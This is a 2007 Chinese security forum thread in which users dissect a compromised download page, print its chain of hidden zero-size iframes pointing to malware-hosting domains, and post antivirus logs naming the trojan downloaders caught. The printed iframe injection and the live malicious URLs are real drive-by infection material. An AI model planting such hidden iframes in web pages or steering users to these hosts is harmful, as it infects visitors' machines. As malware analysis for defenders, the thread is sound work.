毒网一个，大家看

显示全部楼层 · 发表于 2007-1-14 16:49:59

http://ew.gqjy.net/soft/aqxg/bdfz/200608/229.html

显示全部楼层 · 发表于 2007-1-14 17:17:07

多层镶嵌，晕

http://ew.gqjy.net/soft/aqxg/bdfz/200608/229.html里面的：

</html><iframe src=http://q1.go.3322.org width=0 height=0 frameborder=0></iframe>

http://q1.go.3322.org/index.html又在镶嵌一次：

<HTML><HEAD>
<meta http-equiv="refresh" c>
</HEAD>
<body></body></html>

http://www.wulin7.cn/sys/nima.htm里面再次镶嵌：

<iframe src="http://www.wulin7.cn/sys/1.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/2.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/3.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/6.htm" name="zhu" width="0"height="0" frameborder="0">
<script src='http://s90.cnzz.com/stat.php?id=329517&web_id=329517' language='JavaScript' charset='gb2312'></script>

这次捉到了三个了
已隔离: 木马程序 Trojan-Downloader.JS.gen (修改) 文件: C:\Documents and Settings\Administrator\桌面\2.htm.td
已删除: 木马程序 Trojan-Downloader.VBS.Small.dc 文件: C:\Documents and Settings\Administrator\桌面\3.htm.td
已删除: 木马程序 Trojan-Downloader.HTML.Agent.br 文件: C:\Documents and Settings\Administrator\桌面\6.htm.td

http://s90.cnzz.com/stat.php?id=329517&web_id=329517重定向到的login.php文件里面竟然写着：

本站(cnzz.com)<br />仅为“挂马”提供流量统计服务，“挂马”的经营活动均与本站无任何关系！

显示全部楼层 · 发表于 2007-1-14 17:24:51

仅为“挂马”提供流量统计服务，“挂马”的经营活动均与本站无任何关系！

显示全部楼层 · 发表于 2007-1-14 20:19:49

呵呵，多谢，病毒收藏了

显示全部楼层 · 发表于 2007-1-14 20:33:54

毒网怎么你还你还设置链接啊？要是像我们这样的小兵点了进去，那还不给毒死了啊！！

显示全部楼层 · 发表于 2007-1-14 21:00:56

我会建议ALEX再制定版规，如果有危险连接就用下面的方式来添加：

www.sina.com.cn

复制代码

就不会误点击了

代码为[code][/code]

显示全部楼层 · 发表于 2007-1-14 21:14:03

我的KIS 6.0307---
2007-1-14 下午 9:14:49 恶意 HTTP 对象 <http://www.wulin7.cn/sys/2.htm>: 已检测新变种木马程序 Trojan-Downloader.JS.gen.
2007-1-14 下午 9:14:49 恶意 HTTP 对象 <http://www.wulin7.cn/sys/2.htm>: 拒绝访问.
2007-1-14 下午 9:14:49 恶意 HTTP 对象 <http://www.wulin7.cn/sys/3.htm>: 已检测木马程序 Trojan-Downloader.VBS.Small.dc.
2007-1-14 下午 9:14:49 恶意 HTTP 对象 <http://www.wulin7.cn/sys/3.htm>: 拒绝访问.
2007-1-14 下午 9:14:50 恶意 HTTP 对象 <http://www.wulin7.cn/sys/6.htm>: 已检测木马程序 Trojan-Downloader.HTML.Agent.br.
2007-1-14 下午 9:14:50 恶意 HTTP 对象 <http://www.wulin7.cn/sys/6.htm>: 拒绝访问.

显示全部楼层 · 发表于 2007-1-14 21:24:10

原帖由 jzhhh 于 2007-1-14 21:00 发表
我会建议ALEX再制定版规，如果有危险连接就用下面的方式来添加：

www.sina.com.cn
就不会误点击了

代码为

置顶的帖子里 s1ck 已经规定过了
可是大家都不看的

显示全部楼层 · 发表于 2007-1-14 22:23:36

才3个啊~~ 我的驱逐舰就隔离了6个，微点又杀了几个~~~~~~~~```

显示全部楼层 · 发表于 2007-1-14 22:23:38

应该怎么选择,默认的是图中所指.这个意思是什么,大家一般怎么样操作

毒网一个，大家看

评分

回复 #5 snaillc 的帖子

评分

回复 #2 dikex 的帖子

本帖子中包含更多资源